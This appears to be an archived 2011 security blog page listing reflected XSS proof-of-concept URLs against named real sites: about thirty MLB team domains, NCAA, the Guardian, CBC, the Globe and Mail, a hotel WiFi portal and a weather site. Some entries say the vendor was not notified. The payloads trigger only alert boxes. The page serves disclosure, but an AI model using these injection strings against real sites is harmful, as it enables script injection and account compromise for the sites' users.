This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
21
Feb 11

MLB Network-Wide XSS

Date: Feb-21-2011
Vendor Notified: Yes
Proof of Concept:

American League:

http://baltimore.orioles.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=bal&x=13&y=3

http://boston.redsox.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=bos&x=12&y=7

http://newyork.yankees.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=nyy&x=16&y=8

http://tampabay.rays.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=tb&x=17&y=10

http://toronto.bluejays.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=tor&x=20&y=8

http://chicago.whitesox.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=cws&x=19&y=5

http://cleveland.indians.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=cle&x=13&y=5

http://detroit.tigers.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=det&x=7&y=5

http://kansascity.royals.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=kc&x=13&y=6

http://minnesota.twins.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=min&x=11&y=3

http://losangeles.angels.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=ana&x=14&y=4

http://oakland.athletics.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=oak&x=15&y=6

http://seattle.mariners.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=sea&x=19&y=9

http://texas.rangers.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=tex&x=14&y=10

National League:

http://atlanta.braves.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=atl&x=18&y=3

http://florida.marlins.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=fla&x=18&y=9

http://newyork.mets.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=nym&x=18&y=5

http://philadelphia.phillies.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=phi&x=21&y=8

http://washington.nationals.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=was&x=23&y=7

http://chicago.cubs.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=chc&x=20&y=7

http://cincinnati.reds.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=cin&x=7&y=6

http://houston.astros.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=hou&x=13&y=4

http://milwaukee.brewers.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=mil&x=25&y=10

http://pittsburgh.pirates.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=pit&x=15&y=4

http://stlouis.cardinals.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=stl&x=12&y=2

http://arizona.diamondbacks.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=ari&x=13&y=6

http://colorado.rockies.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=col&x=19&y=10

http://losangeles.dodgers.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=la&x=4&y=8

http://sandiego.padres.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=sd&x=15&y=8

http://sanfrancisco.giants.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&c_id=sf&x=12&y=4

MLB.com:

http://mlb.mlb.com/search/?query=%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%270%27%29%3B%3C%2Fscript%3E&x=12&y=7

21
Feb 11

NCAA

Date: Feb-21-2011
Vendor Notified: No
Proof of Concept:
http://www.ncaa.com/schools/--%3E%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

21
Feb 11

Guardian.co.uk

Date: Feb-21-2011
Vendor Notified: Yes
Proof of Concept:
http://www.guardian.co.uk/websearch?q=%22%3E%27%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

20
Feb 11

CBC

Date: Feb-20-2011
Vendor Notified: No
Proof of Concept:
http://www.cbc.ca/search/cbc?ie=utf8&site=CBC&output=xml_no_dtd&getfields=description&oe=utf8&safe=high&q=%27;alert%280%29//\%27;

20
Feb 11

The Globe and Mail

Date: Feb-20-2011
Vendor Notified: No
Proof of Concept:
http://www.theglobeandmail.com/search/?q=%27;//\%22;alert%280%29//--%3E%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert%280%29%3C/script%3E

04
Feb 11

SingleDigits Hotel WiFi

Date: Feb-04-2011
Vendor Notified: Yes
Proof of Concept:
https://hotspot.singledigits.net/index.jsp?msg=/%3E%3C/script%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&typ=sys

01
Feb 11

weatherzombie.com

Date: Feb-01-2011
Vendor Notified: Yes
Proof of Concept:
http://www.weatherzombie.com/search/?q=/%3E%3C/script%3E%3Cscript%3Ealert(%27XSS%27);%3C/script%3E

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab